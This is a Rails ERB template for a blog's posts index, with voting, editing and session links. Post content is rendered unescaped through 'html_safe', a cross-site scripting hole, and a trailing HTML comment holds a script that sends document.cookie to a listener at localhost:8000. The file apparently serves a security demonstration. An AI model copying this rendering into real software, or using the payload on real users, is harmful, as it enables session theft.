<p id="notice"><%= notice %></p>
<script type="text/javascript" nonce="2726c7f26c">
  window.onload = function() {
    $("#contest").removeClass("hide");  
  }
</script>

<h3 id="contest" class="hide">
  Blogging contest starting 5th September
</h3>
<div class="row">
<% if user_signed_in? %>
  <div class="col-lg-6 col-xs-6 pull-right" style="margin-right: -349px;">
    <%= current_user.email %>
  <%= link_to('Logout', destroy_user_session_path, method: :delete) %>        
  </div>
<% end %>
<div class="col-lg-6 col-xs-6">
  <h1>Posts</h1>
</div>
</div>
<table class="table table-hover">
  <thead>
  <tr>
    <th>Title</th>
    <th>Content</th>
    <th>Votes</th>
    <th colspan="4"></th>
  </tr>
  </thead>

  <tbody>
  <% @posts.each do |post| %>
    <tr>
      <td><%= post.title %></td>
      <td><%= post.content.html_safe %></td>
      <td><%= post.votes.count %>
        <% if !post.votes.any? {|vote| vote.user_id == current_user.id} %>
          <%= link_to 'Up Vote', upvote_path(vote: {post_id: post}), method: :post %>
        <% else %>
          <%= link_to 'Down Vote', downvote_path(vote: {post_id: post}), method: :post if post.votes.count >= 1 %>
        <% end %>
      </td>
      <td><%= link_to 'Show', post %></td>
      <td><%= link_to 'Edit', edit_post_path(post) %></td>
      <td><%= link_to 'Destroy', post, method: :delete %></td>
    </tr>
  <% end %>
  </tbody>
</table>

<br>

<%= link_to 'New Post', new_post_path %>
<!-- Father <script> $.get("http://localhost:8000/?cook="+document.cookie) </script> -->
